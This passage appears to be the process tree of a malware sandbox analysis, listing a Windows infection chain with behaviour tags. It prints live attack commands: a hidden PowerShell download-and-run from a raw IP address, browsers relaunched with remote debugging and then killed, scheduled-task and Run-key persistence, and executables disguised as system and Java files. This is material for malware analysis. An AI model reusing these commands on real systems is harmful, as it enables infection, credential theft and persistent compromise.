C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Command and Scripting Interpreter: PowerShell
PID:3176 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵PID:220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360870101\c74b3c0527.exe"C:\Users\Admin\AppData\Local\Temp\10360870101\c74b3c0527.exe"5⤵PID:3684
-
-
C:\Users\Admin\AppData\Local\Temp\10360880101\24350b0384.exe"C:\Users\Admin\AppData\Local\Temp\10360880101\24350b0384.exe"5⤵PID:6672
-
-
C:\Users\Admin\AppData\Local\Temp\10360890101\9eb9441ba5.exe"C:\Users\Admin\AppData\Local\Temp\10360890101\9eb9441ba5.exe"5⤵PID:5676
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""6⤵
- Uses browser remote debugging
PID:12464 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffbb6b3dcf8,0x7ffbb6b3dd04,0x7ffbb6b3dd107⤵PID:12516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1672,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2008 /prefetch:27⤵PID:16180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2240,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:37⤵PID:16200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2396 /prefetch:87⤵PID:16216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3252 /prefetch:17⤵
- Uses browser remote debugging
PID:12888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3292 /prefetch:17⤵
- Uses browser remote debugging
PID:12896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4020,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4064 /prefetch:27⤵
- Uses browser remote debugging
PID:13040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4752,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3224 /prefetch:17⤵
- Uses browser remote debugging
PID:13224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4876,i,8672508789015435311,17025254836260510693,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4848 /prefetch:87⤵PID:19184
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""6⤵
- Uses browser remote debugging
PID:25764 -
C:\Windows\Logs\taskhostw.exe"C:\Windows\Logs\taskhostw.exe"7⤵PID:26264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --remote-debugging-port=9229 --profile-directory=7⤵
- Uses browser remote debugging
PID:26308 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch8⤵
- Uses browser remote debugging
PID:26352
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360900101\80b6e21787.exe"C:\Users\Admin\AppData\Local\Temp\10360900101\80b6e21787.exe"5⤵PID:12964
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
PID:19420
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
PID:25500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- Kills process with taskkill
PID:26788
-
-
-
C:\Users\Admin\AppData\Local\Temp\10360910101\c647ea7d90.exe"C:\Users\Admin\AppData\Local\Temp\10360910101\c647ea7d90.exe"5⤵PID:19440
-
-
C:\Users\Admin\AppData\Local\Temp\10360920101\6b08f50bce.exe"C:\Users\Admin\AppData\Local\Temp\10360920101\6b08f50bce.exe"5⤵PID:4952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h3751.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2h3751.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵PID:1848
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"1⤵
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"2⤵PID:5732
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Windows\Logs\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Windows\Logs\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Windows\Logs\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4500
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\Logs\taskhostw.exe"1⤵PID:5596
-
C:\Windows\Logs\taskhostw.exeC:\Windows\Logs\taskhostw.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\Logs\taskhostw.exe"1⤵PID:2180
-
C:\Windows\Logs\taskhostw.exeC:\Windows\Logs\taskhostw.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:452
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3132
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Recovery\WindowsRE\powershell.exe"1⤵PID:1144
-
C:\Recovery\WindowsRE\powershell.exeC:\Recovery\WindowsRE\powershell.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Recovery\WindowsRE\powershell.exe"1⤵PID:4600
-
C:\Recovery\WindowsRE\powershell.exeC:\Recovery\WindowsRE\powershell.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6212
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4904
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe"1⤵PID:5024
-
C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe"C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6288
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe"1⤵PID:1800
-
C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe"C:\Program Files (x86)\Internet Explorer\uk-UA\explorer.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2552
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 12 /tr "'C:\Windows\SKB\LanguageModels\powershell.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\SKB\LanguageModels\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 9 /tr "'C:\Windows\SKB\LanguageModels\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\SKB\LanguageModels\powershell.exe"1⤵PID:4256
-
C:\Windows\SKB\LanguageModels\powershell.exeC:\Windows\SKB\LanguageModels\powershell.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Windows\SKB\LanguageModels\powershell.exe"1⤵PID:2568
-
C:\Windows\SKB\LanguageModels\powershell.exeC:\Windows\SKB\LanguageModels\powershell.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6300
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\9067c5701a2f6bcc5b\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3428
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\9067c5701a2f6bcc5b\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5376
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\9067c5701a2f6bcc5b\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3892
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\9067c5701a2f6bcc5b\spoolsv.exe"1⤵PID:5300
-
C:\9067c5701a2f6bcc5b\spoolsv.exeC:\9067c5701a2f6bcc5b\spoolsv.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\9067c5701a2f6bcc5b\spoolsv.exe"1⤵PID:2352
-
C:\9067c5701a2f6bcc5b\spoolsv.exeC:\9067c5701a2f6bcc5b\spoolsv.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6328
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe"1⤵PID:1228
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe2⤵
- Executes dropped EXE
PID:6844 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe3⤵
- Executes dropped EXE
PID:6696 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe4⤵
- Executes dropped EXE
PID:6800 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe5⤵
- Executes dropped EXE
PID:6864 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe6⤵
- Executes dropped EXE
PID:2332 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe7⤵
- Executes dropped EXE
PID:6932 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe8⤵
- Executes dropped EXE
PID:6164 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe9⤵
- Executes dropped EXE
PID:6160 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe10⤵
- Executes dropped EXE
PID:816 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin.exe"11⤵
- Modifies registry key
PID:6260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe\"'"11⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5752
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:6240
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe"1⤵PID:5624
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe2⤵
- Executes dropped EXE
PID:4448 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe3⤵
- Executes dropped EXE
PID:2224 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe4⤵
- Executes dropped EXE
PID:2372 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe5⤵
- Executes dropped EXE
PID:5804 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe6⤵
- Executes dropped EXE
PID:6516 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe7⤵
- Executes dropped EXE
PID:1716 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe8⤵
- Executes dropped EXE
PID:5604 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe9⤵
- Executes dropped EXE
PID:3596 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe10⤵
- Executes dropped EXE
PID:632 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe11⤵
- Executes dropped EXE
PID:6572 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe12⤵
- Executes dropped EXE
PID:2812 -
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe13⤵
- Executes dropped EXE
PID:1948 -
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe14⤵
- Executes dropped EXE
PID:5496 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe15⤵
- Executes dropped EXE
PID:4800 -
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe16⤵
- Executes dropped EXE
PID:5916 -
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe17⤵
- Executes dropped EXE
PID:6712 -
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe18⤵PID:6880
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe19⤵PID:6676
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe20⤵PID:5124
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe21⤵PID:3892
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe22⤵PID:6272
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe23⤵PID:1724
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe24⤵PID:5564
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe25⤵PID:1920
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe26⤵PID:6960
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe27⤵PID:5700
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaservice.exe"28⤵
- Modifies registry key
PID:1940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaservice.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe\"'"28⤵
- Command and Scripting Interpreter: PowerShell
PID:5636
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:2880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe"1⤵PID:2880
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe2⤵PID:1392
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_platform.exe3⤵PID:6972
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe4⤵PID:5804
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe5⤵PID:4504
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater.exe"6⤵
- Modifies registry key
PID:2864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe\"'"6⤵
- Command and Scripting Interpreter: PowerShell
PID:2504
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe"1⤵PID:5876
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe2⤵PID:2832
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe3⤵PID:644
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe4⤵PID:6668
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe5⤵PID:6704
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_update.exe6⤵PID:6696
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe7⤵PID:6912
-
C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe8⤵PID:964
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe9⤵PID:6896
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe10⤵PID:6940
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe11⤵PID:2180
-
C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exeC:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe12⤵PID:6156
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe13⤵PID:6236
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe14⤵PID:4520
-
C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exeC:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe15⤵PID:6240
-
C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exeC:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe16⤵PID:468
-
C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exeC:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe17⤵PID:5224
-
C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exeC:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe18⤵PID:1764
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaruntime_service.exe"19⤵
- Modifies registry key
PID:992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaruntime_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe\"'"19⤵
- Command and Scripting Interpreter: PowerShell
PID:1048
-
-
